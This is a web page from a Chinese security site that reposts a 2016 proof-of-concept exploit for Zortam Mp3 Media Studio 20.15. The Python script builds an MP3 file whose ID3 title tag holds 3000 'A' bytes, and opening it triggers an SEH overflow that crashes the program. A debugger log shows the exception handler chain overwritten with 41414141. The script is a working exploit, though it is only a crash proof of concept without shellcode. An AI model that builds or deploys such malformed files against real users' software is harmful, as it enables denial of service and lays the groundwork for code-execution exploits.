首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Zortam Mp3 Media Studio 20.15 - SEH Overflow DoS
来源:http://binsect00.tistory.com 作者:INSECT.B 发布时间:2016-03-15  
#-*- coding: utf-8 -*-
 
#
 
# Exploit Title : Zortam Mp3 Media Studio 20.15 - SEH overflow DOS
 
# Date: 2016-03-12
 
# Author: INSECT.B
 
#   Facebook : https://www.facebook.com/B.INSECT00
 
#   GitHub : binsect00
 
#   Blog : http://binsect00.tistory.com
 
# Vendor Homepage : http://www.zortam.com
 
# Software Link: http://www.zortam.com/download.html
 
# Version: 20.15
 
# Tested on: Windows7 Professional SP1 En x86
 
# CVE : N/A
 
#
 
# Detail..
 
#  1. Zortam Mp3 Media Studio is program that change tags sound file
 
#  2. If tag length over certain length, program is occured crash. 
 
#  3. Make mp3 file. title tag length is 3000.
 
#  4. program open. and serching Directory
 
 
 
 
 
id3Id = '\x49\x44\x33' #ID3
 
id3Version = '\x03\x00'
 
id3Flag = '\x00'
 
id3Size = '\x00\x00\x2F\x2D'
 
id3 = id3Id + id3Version + id3Flag + id3Size
 
 
 
frameId = '\x54\x49\x54\x32' #TIT2
 
frameSize = '\x00\x00\x0B\xB9' #Frame Size
 
frameFlag = '\x00\x00'
 
textEncoding = '\x00'
 
textInfo = 'A'*3000
 
frame = frameId + frameSize + frameFlag + textEncoding + textInfo
 
 
 
 
 
padding = '\x00'*1100
 
 
 
payload = id3 + frame + padding
 
with open('Zortam Mp3 Media Studio 20.15 DOS Vulnerabilities.mp3','wb') as f:
 
    f.write(payload)
 
 
 
'''
 
STATUS_STACK_BUFFER_OVERRUN encountered
 
(aa4.c08): Break instruction exception - code 80000003 (first chance)
 
eax=00000000 ebx=743b74ec ecx=7619e28c edx=0012e4a9 esi=00000000 edi=756d6640
 
eip=7619e109 esp=0012e6f0 ebp=0012e76c iopl=0         nv up ei pl zr na pe nc
 
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\kernel32.dll -
 
kernel32!FormatMessageA+0x14031:
 
7619e109 cc              int     3
 
0:000> !exchain
 
0012e75c: kernel32!RegSaveKeyExA+3e9 (761ca022)
 
0012f2b8: 41414141
 
Invalid exception stack at 41414141
 
'''
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Netgear ReadyNAS Remote Code E
·Internet Explorer - Read AV in
·PHP Utility Belt Remote Code E
·OpenSSH 7.2p1 xauth Command In
·SAP Download Manager 2.1.142 W
·Netwrix Auditor 7.1.322.0 Acti
·Putty pscp <= 0.66 - Stack Buf
·Dropbear SSHD xauth Command In
·libotr <= 4.1.0 - Memory Corru
·FreeBSD 10.2 amd64 Kernel - am
·Exim < 4.86.2 - Local Root Pri
·Cisco UCS Manager 2.1(1b) - Sh
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved